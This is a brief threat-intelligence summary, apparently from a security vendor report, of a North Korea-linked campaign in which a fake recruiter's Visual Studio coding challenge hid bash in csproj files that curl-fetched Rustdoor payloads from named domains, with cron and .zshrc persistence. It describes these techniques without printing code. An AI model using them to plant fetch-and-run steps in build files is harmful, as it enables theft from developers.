Jamf observed DPRK-aligned social engineering against cryptocurrency and developer targets shortly after an FBI warning about North Korean targeting of the crypto sector. In the case described, a LinkedIn recruiter persona sent a zipped Visual Studio coding challenge that hid malicious bash commands inside two csproj files. Building the project used curl to fetch two second-stage Thiefbucket, also known as Rustdoor, payloads from taurihostmetrics.com; the samples communicated with wiresapplication.com and juchesoviet48.com. The payload configurations showed persistence through cron and .zshrc, and one Visual Studio-themed component could prompt for the user password and steal configured files.